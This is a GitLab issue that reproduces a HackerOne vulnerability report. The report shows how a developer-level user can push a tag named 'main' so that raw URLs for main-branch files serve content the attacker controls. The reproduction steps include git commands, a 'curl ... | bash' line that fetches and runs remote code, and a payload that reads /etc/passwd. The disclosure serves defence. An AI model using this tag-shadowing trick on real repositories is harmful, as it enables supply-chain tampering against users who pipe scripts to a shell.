An attacker is able to alter the information in the main branch files
An attacker is able to alter the information in the main branch files that are obtained through https://gitlab.com/user/repo/-/raw/main/file
HackerOne report #1498354 by st4nly0n
on 2022-03-03, assigned to @ankelly:
Report | Attachments | How To Reproduce
Report
Summary
Files in the main branch of a repository can only be modified by members with high privileges within the repository and cannot be directly modified by any other user.
In this context, the use case where the user is asked to execute a script by making a curl request to a file located in the main branch of a repository could have unintended consequences, for example:
curl https://gitlab.com/user/repo/-/raw/main/install.sh | bash
The fact that the file being downloaded is in the main branch of the repository generates certain confidence and security in the user, since the files in the main branch are stable.
When you download a repository with the download button, you get the latest commit or file changes, however, when you push a tag with the name of the main branch for example (main) pointing to a particular commit, It will cause that when downloading the repository, refs/tags/main
will be obtained and not refs/heads/main
, this has the consequence that a developer can modify the content of a file in the main branch in https://gitlab.com/user/repo/-/raw/main/install.sh
with arbitrary code that would be executed by the victim using the use case mentioned
above, i.e. getting and executing code from a file using curl.
Steps to reproduce:
[PREPARATION]
1. Create a repository from gitlab.com, with main branch name main.
2. Add a member with developer permissions.
3. Clone the repository and create a hello_world.sh
file with the following content:
echo 'Hello World'
4. Push the changes to the remote.
[ATTACK] (Guest user in step 2)
5. Clone and enter the repository created in step 1
git clone https:...
6. Create a new branch with the name new-feature
git checkout -b 'new-feature'
7. Edit the content of hello_world.sh
:
echo 'cat /etc/passwd' > hello_world.sh
8. Push the new-feature
branch:
git add .
git commit -m 'new-feature'
git push origin HEAD
9. Create a bash variable with the hash of the last commit in the new-feature
branch
hash=`git rev-parse HEAD`
10. Switch to the main
branch
git checkout main
11. Create a tag with the name of main pointing to the latest commit of the new-feature
branch
git tag main $hash
12. Push the tags to the remote:
git push origin --tags
13. Remove the new-feature
branch from the remote:
git push -d origin 'new-feature'
As a result of this behavior an attacker can manage to change the code of the files in the main branch, causing arbitrary commands to be executed if the victim uses the use case of executing code by making a request to the file url via curl.
What is the current bug behavior?
When a tag is pushed with the name of the main branch for example (main) that points to a particular commit, it will cause refs/tags/main
and not refs/heads/main
to be obtained when downloading the repository.
What is the expected correct behavior?
The file at https://gitlab.com/user/repo/-/raw/main/file.sh
should not be modified by pushing a tag with the main branch name.
Relevant logs and/or screenshots
In the proof of concept video it is shown how the victim uses the use case where he executes the code of a file in the main branch through curl obtaining the expected result, however, an attacker was able to change the content of the file from the main branch, now the victim when executing the same command gets an unexpected result.
poc.mp4
Output of checks
This bug happens on GitLab.com
Impact
An attacker is able to change the content of a main branch file by pushing a tag with the main branch name, this results in the execution of arbitrary commands by the victim using curl to execute code from a main branch. file in the main branch.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: